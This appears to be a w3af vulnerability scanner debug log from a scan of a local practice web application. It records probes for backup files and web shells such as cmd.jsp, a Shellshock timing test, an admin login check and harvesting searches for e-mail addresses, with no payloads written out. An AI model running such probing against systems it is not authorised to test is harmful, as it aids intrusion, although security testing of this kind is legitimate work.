http://localhost:9090/learn.inc returned HTTP code "404" (id=615,from_cache=0,grep=1,rtt=0.08,did=5OaC6pi1) [Wed Feb 12 09:36:45 2020 - debug] GET http://localhost:9090/cmd.jsp returned HTTP code "404" (id=619,from_cache=0,grep=1,rtt=0.29,did=RaLPsX4B) [Wed Feb 12 09:36:45 2020 - debug] [id: 140100612797392] HTTP response delay was 0.29. (lower, expected, upper): 8.00, 8.00, 16.20. [Wed Feb 12 09:36:45 2020 - debug] [did: RaLPsX4B] [id: 140100612797392] Failed to control HTTP response delay for URL http://localhost:9090/cmd.jsp - parameter "User-Agent" for 8 seconds using , response wait time was: 0.291565179825 seconds and response ID: 619. [Wed Feb 12 09:36:45 2020 - debug] GET http://localhost:9090/learn.gzip returned HTTP code "404" (id=613,from_cache=0,grep=1,rtt=0.09,did=6v5aLwOX) [Wed Feb 12 09:36:45 2020 - debug] GET http://localhost:9090/learn.tar.gz returned HTTP code "404" (id=617,from_cache=0,grep=1,rtt=0.10,did=x26Zi9BA) [Wed Feb 12 09:36:45 2020 - debug] GET http://localhost:9090/cmd.jsp returned HTTP code "404" (id=620,from_cache=0,grep=1,rtt=0.25,did=RaLPsX4B) [Wed Feb 12 09:36:45 2020 - debug] [id: 140100612943120] HTTP response delay was 0.25. (lower, expected, upper): 8.00, 8.00, 16.20. [Wed Feb 12 09:36:45 2020 - debug] [did: RaLPsX4B] [id: 140100612943120] Failed to control HTTP response delay for URL http://localhost:9090/cmd.jsp - parameter "User-Agent" for 8 seconds using , response wait time was: 0.254592895508 seconds and response ID: 620. [Wed Feb 12 09:36:45 2020 - debug] GET http://localhost:9090/learn.java returned HTTP code "404" (id=621,from_cache=0,grep=1,rtt=0.07,did=kMlTlPno) [Wed Feb 12 09:36:45 2020 - debug] GET http://localhost:9090/learn.cab returned HTTP code "404" (id=614,from_cache=0,grep=1,rtt=0.15,did=ELtPs5E9) [Wed Feb 12 09:36:45 2020 - debug] GET http://localhost:9090/learn.gz returned HTTP code "404" (id=618,from_cache=0,grep=1,rtt=0.10,did=R4PV0HCc) [Wed Feb 12 09:36:45 2020 - debug] GET http://localhost:9090/learn.bzip2 returned HTTP code "404" (id=616,from_cache=0,grep=1,rtt=0.10,did=itanjpPp) [Wed Feb 12 09:36:45 2020 - debug] GET http://localhost:9090/learn.jar returned HTTP code "404" (id=622,from_cache=0,grep=1,rtt=0.11,did=ojqTgsDl) [Wed Feb 12 09:36:45 2020 - debug] shell_shock.audit(did="RaLPsX4B",uri="http://localhost:9090/cmd.jsp") took 3.34s to run (1.13s 33% sending HTTP requests) [Wed Feb 12 09:36:45 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 51. [Wed Feb 12 09:36:45 2020 - debug] GET http://localhost:9090/learn.7z returned HTTP code "404" (id=612,from_cache=0,grep=1,rtt=0.14,did=iIj43fxw) [Wed Feb 12 09:36:45 2020 - debug] GET http://localhost:9090/learn.zip returned HTTP code "404" (id=623,from_cache=0,grep=1,rtt=0.11,did=TTQGvwFu) [Wed Feb 12 09:36:45 2020 - debug] localhost:9090 connection pool stats (free:50 / in_use:0 / max:50 / total:50) [Wed Feb 12 09:36:45 2020 - debug] There are no connections marked as in use in the connection pool at this time [Wed Feb 12 09:36:45 2020 - debug] GET http://localhost:9090/learn.class returned HTTP code "404" (id=624,from_cache=0,grep=1,rtt=0.12,did=dgWYhD5v) [Wed Feb 12 09:36:45 2020 - debug] GET http://localhost:9090/learn.rar returned HTTP code "404" (id=626,from_cache=0,grep=1,rtt=0.20,did=IYF6BtPh) [Wed Feb 12 09:36:45 2020 - debug] detailed.has_active_session() and detailed.login() [Wed Feb 12 09:36:45 2020 - debug] [auth.detailed] Checking if session for user admin is active (did: tBIIbTUm) [Wed Feb 12 09:36:45 2020 - debug] GET http://localhost:9090/learn.bkp returned HTTP code "404" (id=627,from_cache=0,grep=1,rtt=0.03,did=svJQEBGj) [Wed Feb 12 09:36:45 2020 - debug] GET http://localhost:9090/learn.bak returned HTTP code "404" (id=625,from_cache=0,grep=1,rtt=0.09,did=BIx9ggn4) [Wed Feb 12 09:36:45 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 52. [Wed Feb 12 09:36:45 2020 - debug] GET http://localhost:9090/learn.back returned HTTP code "404" (id=628,from_cache=0,grep=1,rtt=0.13,did=qLIvVeq5) [Wed Feb 12 09:36:45 2020 - debug] GET http://localhost:9090/learn.backup1 returned HTTP code "404" (id=629,from_cache=0,grep=1,rtt=0.06,did=lkh8qzXw) [Wed Feb 12 09:36:45 2020 - debug] GET http://localhost:9090/learn.bak1 returned HTTP code "404" (id=631,from_cache=0,grep=1,rtt=0.14,did=0LgAkVbM) [Wed Feb 12 09:36:45 2020 - debug] GET http://localhost:9090/learn/vulnerability/a1_injection returned HTTP code "200" (id=632,from_cache=0,grep=0,rtt=0.18,did=tBIIbTUm) [Wed Feb 12 09:36:45 2020 - debug] [auth.detailed] User "admin" is currently logged into the application (did: tBIIbTUm) [Wed Feb 12 09:36:45 2020 - debug] detailed._login() took 0.40s to run [Wed Feb 12 09:36:45 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 53. [Wed Feb 12 09:36:45 2020 - debug] GET http://localhost:9090/learn.old returned HTTP code "404" (id=630,from_cache=0,grep=1,rtt=0.21,did=8ELCCXY2) [Wed Feb 12 09:36:45 2020 - debug] GET http://localhost:9090/learn.properties returned HTTP code "404" (id=633,from_cache=0,grep=1,rtt=0.26,did=wDkVMFKd) [Wed Feb 12 09:36:45 2020 - debug] GET http://localhost:9090/learn.$$$ returned HTTP code "404" (id=639,from_cache=0,grep=1,rtt=0.18,did=1964Ii3x) [Wed Feb 12 09:36:45 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 54. [Wed Feb 12 09:36:45 2020 - debug] GET http://localhost:9090/localhost.tar.gz returned HTTP code "404" (id=634,from_cache=0,grep=1,rtt=0.09,did=dhnQpkXk) [Wed Feb 12 09:36:45 2020 - debug] GET http://localhost:9090/learn.backup returned HTTP code "404" (id=640,from_cache=0,grep=1,rtt=0.53,did=hfTxbJKI) [Wed Feb 12 09:36:45 2020 - debug] GET http://localhost:9090/learn.old1 returned HTTP code "404" (id=636,from_cache=0,grep=1,rtt=0.09,did=GM4NAbnq) [Wed Feb 12 09:36:45 2020 - debug] GET http://localhost:9090/localhost.7z returned HTTP code "404" (id=637,from_cache=0,grep=1,rtt=0.21,did=SMQ7jKbI) [Wed Feb 12 09:36:45 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 55. [Wed Feb 12 09:36:46 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 56. [Wed Feb 12 09:36:46 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 57. [Wed Feb 12 09:36:46 2020 - debug] GET http://www.bing.com/search?q=@localhost.&FORM=PERE&first=111 returned HTTP code "200" (id=635,from_cache=0,grep=0,rtt=0.55,did=GcQVJ1cu) [Wed Feb 12 09:36:46 2020 - debug] GET http://localhost:9090/localhost.gz returned HTTP code "404" (id=638,from_cache=0,grep=1,rtt=0.07,did=RB9SQiDi) [Wed Feb 12 09:36:46 2020 - debug] GET http://localhost:9090/localhost.cab returned HTTP code "404" (id=641,from_cache=0,grep=1,rtt=0.07,did=O9OysXsa) [Wed Feb 12 09:36:46 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 58. [Wed Feb 12 09:36:46 2020 - debug] GET http://localhost:9090/localhost.tgz returned HTTP code "404" (id=642,from_cache=0,grep=1,rtt=0.18,did=Rkg9Z7Hg) [Wed Feb 12 09:36:46 2020 - debug] vulners_db.grep(uri="http://localhost:9090/.listing") took 27.86s to run [Wed Feb 12 09:36:46 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/robots.txt") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] keys.grep(uri="http://localhost:9090/robots.txt") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] vulners_db.grep(uri="http://localhost:9090/wp-login.php") took 25.13s to run [Wed Feb 12 09:36:46 2020 - debug] clamav.grep(uri="http://localhost:9090/robots.txt") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] vulners_db.grep(uri="http://localhost:9090/robots.txt") took 21.45s to run [Wed Feb 12 09:36:46 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 59. [Wed Feb 12 09:36:46 2020 - debug] http_auth_detect.grep(uri="http://localhost:9090/robots.txt") took 0.02s to run [Wed Feb 12 09:36:46 2020 - debug] form_autocomplete.grep(uri="http://localhost:9090/robots.txt") took 0.04s to run [Wed Feb 12 09:36:46 2020 - debug] html_comments.grep(uri="http://localhost:9090/robots.txt") took 0.04s to run [Wed Feb 12 09:36:46 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/robots.txt") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] objects.grep(uri="http://localhost:9090/robots.txt") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] error_500.grep(uri="http://localhost:9090/robots.txt") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] meta_tags.grep(uri="http://localhost:9090/robots.txt") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] vulners_db.grep(uri="http://localhost:9090/") took 29.56s to run [Wed Feb 12 09:36:46 2020 - debug] strange_parameters.grep(uri="http://localhost:9090/robots.txt") took 0.02s to run [Wed Feb 12 09:36:46 2020 - debug] password_profiling.grep(uri="http://localhost:9090/robots.txt") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] click_jacking.grep(uri="http://localhost:9090/robots.txt") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/robots.txt") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] lang.grep(uri="http://localhost:9090/robots.txt") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 60. [Wed Feb 12 09:36:46 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 61. [Wed Feb 12 09:36:46 2020 - debug] vulners_db.grep(uri="http://localhost:9090/_vti_inf.html") took 28.63s to run [Wed Feb 12 09:36:46 2020 - debug] url_session.grep(uri="http://localhost:9090/robots.txt") took 0.04s to run [Wed Feb 12 09:36:46 2020 - debug] GET http://localhost:9090/localhost.rar returned HTTP code "404" (id=647,from_cache=0,grep=1,rtt=0.14,did=5nAv0zub) [Wed Feb 12 09:36:46 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/robots.txt") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] GET http://localhost:9090/localhost.zip returned HTTP code "404" (id=644,from_cache=0,grep=1,rtt=0.07,did=bzBPKk5b) [Wed Feb 12 09:36:46 2020 - debug] GET http://web.archive.org/web/*/http:/localhost:9090/learn returned HTTP code "200" (id=646,from_cache=1,grep=1,rtt=1.95,did=802pAiQu) [Wed Feb 12 09:36:46 2020 - debug] GET http://localhost:9090/localhost.gzip returned HTTP code "404" (id=645,from_cache=0,grep=1,rtt=0.12,did=3CATb93r) [Wed Feb 12 09:36:46 2020 - debug] strange_reason.grep(uri="http://localhost:9090/robots.txt") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/robots.txt") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/robots.txt") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] cache_control.grep(uri="http://localhost:9090/robots.txt") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] strange_headers.grep(uri="http://localhost:9090/robots.txt") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] ssn.grep(uri="http://localhost:9090/robots.txt") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] oracle.grep(uri="http://localhost:9090/robots.txt") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] feeds.grep(uri="http://localhost:9090/robots.txt") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] error_pages.grep(uri="http://localhost:9090/robots.txt") took 0.03s to run [Wed Feb 12 09:36:46 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 62. [Wed Feb 12 09:36:46 2020 - debug] GET http://localhost:9090/localhost.bzip2 returned HTTP code "404" (id=643,from_cache=0,grep=1,rtt=0.08,did=a251q0yK) [Wed Feb 12 09:36:46 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 348, 'reject-seen-url': 85, 'reject-out-of-scope': 7, 'accept': 110} [Wed Feb 12 09:36:46 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 63. [Wed Feb 12 09:36:46 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 64. [Wed Feb 12 09:36:46 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 65. [Wed Feb 12 09:36:46 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 66. [Wed Feb 12 09:36:46 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/robots.txt") took 0.02s to run [Wed Feb 12 09:36:46 2020 - debug] Archive.org did not find any pages. [Wed Feb 12 09:36:46 2020 - debug] archive_dot_org.discover(did="GYfYkGIL",uri="http://localhost:9090/learn") took 4.87s to run [Wed Feb 12 09:36:46 2020 - debug] urllist_txt.discover(http://localhost:9090/learn, did=0PbE2Bjo) [Wed Feb 12 09:36:46 2020 - debug] [urllist_txt] Crawling "http://localhost:9090/learn" [Wed Feb 12 09:36:46 2020 - debug] The crawl plugin: "urllist_txt" wont be run anymore. [Wed Feb 12 09:36:46 2020 - debug] Starting CrawlInfra consumer _teardown() with 1 plugins [Wed Feb 12 09:36:46 2020 - debug] Calling urllist_txt.end() [Wed Feb 12 09:36:46 2020 - debug] Spent 0.00 seconds running urllist_txt.end() [Wed Feb 12 09:36:46 2020 - debug] Finished CrawlInfra consumer _teardown() [Wed Feb 12 09:36:46 2020 - debug] urllist_txt.discover(did="0PbE2Bjo",uri="http://localhost:9090/learn") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 67. [Wed Feb 12 09:36:46 2020 - debug] find_backdoors.discover(http://localhost:9090/learn, did=kpsSOH9Q) [Wed Feb 12 09:36:46 2020 - debug] [find_backdoors] Crawling "http://localhost:9090/learn" [Wed Feb 12 09:36:46 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 68. [Wed Feb 12 09:36:46 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 69. [Wed Feb 12 09:36:46 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 70. [Wed Feb 12 09:36:46 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 71. [Wed Feb 12 09:36:46 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 72. [Wed Feb 12 09:36:46 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 73. [Wed Feb 12 09:36:46 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 74. [Wed Feb 12 09:36:46 2020 - debug] symfony.grep(uri="http://localhost:9090/execute.xml") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] find_backdoors.discover(did="kpsSOH9Q",uri="http://localhost:9090/learn") took 0.02s to run [Wed Feb 12 09:36:46 2020 - debug] web_spider.discover(http://localhost:9090/learn, did=AnpPqF7F) [Wed Feb 12 09:36:46 2020 - debug] [web_spider] Crawling "http://localhost:9090/learn" [Wed Feb 12 09:36:46 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 75. [Wed Feb 12 09:36:46 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 76. [Wed Feb 12 09:36:46 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 77. [Wed Feb 12 09:36:46 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 78. [Wed Feb 12 09:36:46 2020 - debug] url_fuzzer.discover(did="yrCsPE8F",uri="http://localhost:9090/learn") took 4.40s to run [Wed Feb 12 09:36:46 2020 - debug] find_captchas.discover(http://localhost:9090/learn, did=4HoQUTsr) [Wed Feb 12 09:36:46 2020 - debug] [find_captchas] Crawling "http://localhost:9090/learn" [Wed Feb 12 09:36:46 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/execute.xml") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] expect_ct.grep(uri="http://localhost:9090/execute.xml") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] svn_users.grep(uri="http://localhost:9090/execute.xml") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/execute.xml") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] private_ip.grep(uri="http://localhost:9090/execute.xml") took 0.07s to run [Wed Feb 12 09:36:46 2020 - debug] motw.grep(uri="http://localhost:9090/execute.xml") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] meta_generator.grep(uri="http://localhost:9090/execute.xml") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/execute.xml") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/execute.xml") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] file_upload.grep(uri="http://localhost:9090/execute.xml") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 09:36:46 2020 - debug] serialized_object.grep(uri="http://localhost:9090/execute.xml") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] blank_body.grep(uri="http://localhost:9090/execute.xml") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/execute.xml") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/execute.xml") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] credit_cards.grep(uri="http://localhost:9090/execute.xml") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] websockets_links.grep(uri="http://localhost:9090/execute.xml") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] csp.grep(uri="http://localhost:9090/execute.xml") took 0.01s to run [Wed Feb 12 09:36:46 2020 - debug] dom_xss.grep(uri="http://localhost:9090/execute.xml") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] vulners_db.grep(uri="http://localhost:9090/execute.xml") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/execute.xml") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] keys.grep(uri="http://localhost:9090/execute.xml") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] GET http://localhost:9090/learn returned HTTP code "200" (id=648,from_cache=0,grep=1,rtt=0.22,did=1dcNca4J) [Wed Feb 12 09:36:46 2020 - debug] GET http://localhost:9090/learn returned HTTP code "200" (id=649,from_cache=1,grep=1,rtt=0.14,did=05y5ElBs) [Wed Feb 12 09:36:46 2020 - debug] "http://localhost:9090/learn" (id:649, code:200, len:10863, did:05y5ElBs) is NOT a 404 [URL 404 cache] [Wed Feb 12 09:36:46 2020 - debug] VariantDB is returning False because of "seen_exactly_the_same" for "Method: GET | http://localhost:9090/" [Wed Feb 12 09:36:46 2020 - debug] http_in_body.grep(uri="http://localhost:9090/execute.xml") took 0.33s to run [Wed Feb 12 09:36:46 2020 - debug] form_cleartext_password.grep(uri="http://localhost:9090/execute.xml") took 0.19s to run [Wed Feb 12 09:36:46 2020 - debug] clamav.grep(uri="http://localhost:9090/execute.xml") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] html_comments.grep(uri="http://localhost:9090/execute.xml") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] strange_parameters.grep(uri="http://localhost:9090/execute.xml") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] url_session.grep(uri="http://localhost:9090/execute.xml") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/execute.xml") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] objects.grep(uri="http://localhost:9090/execute.xml") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] error_500.grep(uri="http://localhost:9090/execute.xml") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] meta_tags.grep(uri="http://localhost:9090/execute.xml") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] password_profiling.grep(uri="http://localhost:9090/execute.xml") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] click_jacking.grep(uri="http://localhost:9090/execute.xml") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/execute.xml") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] "http://localhost:9090/learn" (id:649, code:200, len:10863, did:05y5ElBs) is NOT a 404 [URL 404 cache] [Wed Feb 12 09:36:46 2020 - debug] VariantDB is returning False because of "seen_exactly_the_same" for "Method: GET | http://localhost:9090/learn/vulnerability/a9_vuln_component" [Wed Feb 12 09:36:46 2020 - debug] http_auth_detect.grep(uri="http://localhost:9090/execute.xml") took 0.01s to run [Wed Feb 12 09:36:46 2020 - debug] lang.grep(uri="http://localhost:9090/execute.xml") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/execute.xml") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] error_pages.grep(uri="http://localhost:9090/execute.xml") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] strange_reason.grep(uri="http://localhost:9090/execute.xml") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/execute.xml") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/execute.xml") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] cache_control.grep(uri="http://localhost:9090/execute.xml") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] strange_headers.grep(uri="http://localhost:9090/execute.xml") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] ssn.grep(uri="http://localhost:9090/execute.xml") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] oracle.grep(uri="http://localhost:9090/execute.xml") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] feeds.grep(uri="http://localhost:9090/execute.xml") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/execute.xml") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] get_emails.grep(uri="http://localhost:9090/robots.txt") took 0.55s to run [Wed Feb 12 09:36:46 2020 - debug] VariantDB is returning False because of "seen_exactly_the_same" for "Method: GET | http://localhost:9090/assets/showdown.min.js" [Wed Feb 12 09:36:46 2020 - debug] web_spider will ignore maxcdn.bootstrapcdn.com (different domain name) [Wed Feb 12 09:36:46 2020 - debug] VariantDB is returning False because of "seen_exactly_the_same" for "Method: GET | http://localhost:9090/logout" [Wed Feb 12 09:36:46 2020 - debug] VariantDB is returning False because of "seen_exactly_the_same" for "Method: GET | http://localhost:9090/learn/vulnerability/a7_xss" [Wed Feb 12 09:36:46 2020 - debug] VariantDB is returning False because of "seen_exactly_the_same" for "Method: GET | http://localhost:9090/learn/vulnerability/a3_sensitive_data" [Wed Feb 12 09:36:46 2020 - debug] VariantDB is returning False because of "seen_exactly_the_same" for "Method: GET | http://localhost:9090/learn/vulnerability/a10_logging" [Wed Feb 12 09:36:46 2020 - debug] form_autocomplete.grep(uri="http://localhost:9090/execute.xml") took 0.19s to run [Wed Feb 12 09:36:46 2020 - debug] The framework has 115 active threads. [Wed Feb 12 09:36:46 2020 - debug] symfony.grep(uri="http://localhost:9090/~_w_3_a_f_/") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/~_w_3_a_f_/") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] VariantDB is returning False because of "seen_exactly_the_same" for "Method: GET | http://localhost:9090/learn/vulnerability/a1_injection" [Wed Feb 12 09:36:46 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/~_w_3_a_f_/") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] expect_ct.grep(uri="http://localhost:9090/~_w_3_a_f_/") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] svn_users.grep(uri="http://localhost:9090/~_w_3_a_f_/") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/~_w_3_a_f_/") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] private_ip.grep(uri="http://localhost:9090/~_w_3_a_f_/") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] motw.grep(uri="http://localhost:9090/~_w_3_a_f_/") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] meta_generator.grep(uri="http://localhost:9090/~_w_3_a_f_/") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] VariantDB is returning False because of "seen_exactly_the_same" for "Method: GET | http://localhost:9090/learn/vulnerability/a5_broken_access_control" [Wed Feb 12 09:36:46 2020 - debug] VariantDB is returning False because of "seen_exactly_the_same" for "Method: GET | http://localhost:9090/assets/fa/css/font-awesome.min.css" [Wed Feb 12 09:36:46 2020 - debug] file_upload.grep(uri="http://localhost:9090/~_w_3_a_f_/") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/~_w_3_a_f_/") took 0.00s to run [Wed Feb 12 09:36:46 2020 - debug] VariantDB is returning False because of "seen_exactly_the_same" for "Method: GET | http://localhost:9090/learn/vulnerability/a4_xxe" [Wed Feb 12 09:36:46 2020 - debug] VariantDB is returning False because of "seen_exactly_the_same" for "Method: GET | http://localhost:9090/learn/vulnerability/a6_sec_misconf" [Wed Feb 12 09:36:46 2020 - debug] VariantDB is returning False because of "seen_exactly_the_same" for "Method: GET | http://localhost:9090/learn/vulnerability/a8_ides" [Wed Feb 12 09:36:46 2020 - debug] VariantDB is returning False because of "seen_exactly_the_same" for "Method: GET | http://localhost:9090/learn/vulnerability/ax_csrf" [Wed Feb 12 09:36:47 2020 - debug] GET http://www.bing.com/search?q=@localhost.&FORM=PERE&first=121 returned HTTP code "200" (id=650,from_cache=0,grep=0,rtt=0.60,did=DHo2BgDS) [Wed Feb 12 09:36:47 2020 - debug] http_in_body.grep(uri="http://localhost:9090/~_w_3_a_f_/") took 0.14s to run [Wed Feb 12 09:36:47 2020 - debug] web_spider will ignore cdnjs.cloudflare.com (different domain name) [Wed Feb 12 09:36:47 2020 - debug] VariantDB is returning False because of "seen_exactly_the_same" for "Method: GET | http://localhost:9090/learn/vulnerability/ax_redirect" [Wed Feb 12 09:36:47 2020 - debug] 